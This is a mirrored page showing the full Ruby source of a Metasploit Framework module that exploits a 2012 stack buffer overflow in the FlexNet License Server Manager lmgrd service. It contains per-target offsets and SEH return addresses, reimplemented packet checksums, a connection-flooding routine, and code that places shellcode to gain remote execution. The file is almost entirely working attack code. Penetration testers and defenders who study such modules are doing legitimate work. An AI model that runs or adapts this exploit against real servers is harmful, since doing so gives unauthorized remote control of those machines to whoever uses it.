CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'FlexNet License Server Manager lmgrd Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a vulnerability in the FlexNet

17
        License Server Manager.

18


19
        The vulnerability is due to the insecure usage of memcpy

20
        in the lmgrd service when handling network packets, which

21
        results in a stack buffer overflow.

22


23
        In order to improve reliability, this module will make lots of

24
        connections to lmgrd during each attempt to maximize its success.

25
      },

26
      'Author'         =>

27
        [

28
          'Luigi Auriemma', # Vulnerability Discovery and PoC

29
          'Alexander Gavrun', # Vulnerability Discovery

30
          'juan vazquez', # Metasploit module

31
          'sinn3r' # Metasploit module

32
        ],

33
      'License'        => MSF_LICENSE,

34
      'References'     =>

35
        [

36
          [ 'OSVDB', '81899' ],

37
          [ 'BID', '52718' ],

38
          [ 'ZDI', '12-052' ],

39
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],

40
          [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory

41
        ],

42
      'Privileged'     => true,

43
      'DefaultOptions' =>

44
        {

45
          'EXITFUNC' => 'process'

46
        },

47
      'Payload' =>

48
        {

49
          'Space' => 4000

50
        },

51
      'Platform'       => 'win',

52
      'Targets'        =>

53
        [

54
          [ 'Debug', {} ],

55
          [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',

56
            {

57
              'Offset' => 10476,

58
              'ShellcodeOffset' => 5484,

59
              'Ret' => 0x0047d01f # ppr from lmgrd.exe

60
            }

61
          ],

62
          [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',

63
            {

64
              'Offset' => 7324,

65
              'ShellcodeOffset' => 2332,

66
              'Ret' => 0x004eda91 # ppr from lmgrd.exe

67
            }

68
          ],

69
          [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',

70
            {

71
              'Offset' => 7320,

72
              'ShellcodeOffset' => 2328,

73
              'Ret' => 0x004eb2e1 # ppr from lmgrd.exe

74
            }

75
          ],

76
        ],

77
      'DefaultTarget'  => 1,

78
      'DisclosureDate' => '2012-03-23'))

79


80
    register_options(

81
      [

82
        Opt::RPORT(27000),

83
        OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),

84
        OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),

85
        OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])

86
      ])

87
  end

88


89
  def header_checksum(packet)

90
    packet_bytes = packet.unpack("C*")

91
    checksum = packet_bytes[0]

92
    i = 2

93
    while i < 0x14

94
      checksum = checksum + packet_bytes[i]

95
      i = i + 1

96
    end

97
    return (checksum & 0x0FF)

98
  end

99


100
  def data_checksum(packet_data)

101
    word_table = ""

102
    i = 0

103
    while i < 256

104
      v4 = 0

105
      v3 = i

106
      j = 8

107


108
      while j > 0

109
        if ((v4 ^ v3) & 1) == 1

110
          v4 = ((v4 >> 1) ^ 0x3A5D) & 0x0FFFF

111
        else

112
          v4 = (v4 >> 1) & 0x0FFFF

113
        end

114
        v3 >>= 1

115
        j = j - 1

116
      end

117


118
      word_table << [v4].pack("S")

119
      i = i + 1

120
    end

121
    k = 0

122
    checksum = 0

123
    data_bytes = packet_data.unpack("C*")

124
    word_table_words = word_table.unpack("S*")

125
    while k < packet_data.length

126
      position = data_bytes[k] ^ (checksum & 0x0FF)

127
      checksum = (word_table_words[position] ^ (checksum >> 8)) & 0x0FFFF

128
      k = k + 1

129
    end

130
    return checksum

131
  end

132


133
  def create_packet(data)

134
    pkt = "\x2f"

135
    pkt << "\x00" # header checksum

136
    pkt << "\x00\x00" # data checksum

137
    pkt << "\x00\x00" # pkt length

138
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

139
    pkt << data

140


141
    pkt[4,2] = [pkt.length].pack("n")

142


143
    data_sum = data_checksum(pkt[4, pkt.length - 4])

144
    pkt[2, 2] = [data_sum].pack("n")

145


146
    hdr_sum = header_checksum(pkt[0, 20])

147
    pkt[1] = [hdr_sum].pack("C")

148


149
    return pkt

150
  end

151


152
  def jam

153
    pkt = create_packet("")

154


155
    datastore['Jam'].times do

156
      connect

157
      sock.put(pkt)

158
      disconnect

159
    end

160
  end

161


162
  def exploit

163
    i = 1

164
    while i <= datastore['Attempts'] and not session_created?

165
      print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")

166
      do_exploit

167
      sleep(datastore['Wait'])

168
      i = i + 1

169
    end

170


171
    if not session_created?

172
      print_error("Exploit didn't work after #{i} attempts")

173
    end

174
  end

175


176
  def do_exploit

177
    t = framework.threads.spawn("jam", false) { jam }

178
    my_payload = payload.encoded

179


180
    header_length = 20 # See create_packet() to understand this number

181
    pkt_data = ""

182
    if target.name =~ /Debug/

183
      pkt_data << "a" * (65535 - header_length)

184
    else

185


186
      pkt_data << rand_text(target['ShellcodeOffset'])

187
      pkt_data << my_payload

188
      pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)

189
      pkt_data << generate_seh_record(target.ret)

190
      pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string

191
      pkt_data << rand_text(65535 - pkt_data.length - header_length)

192
    end

193


194
    pkt = create_packet(pkt_data)

195


196
    connect

197
    sock.put(pkt)

198
    handler

199
    disconnect

200
  end

201
end

202


203


204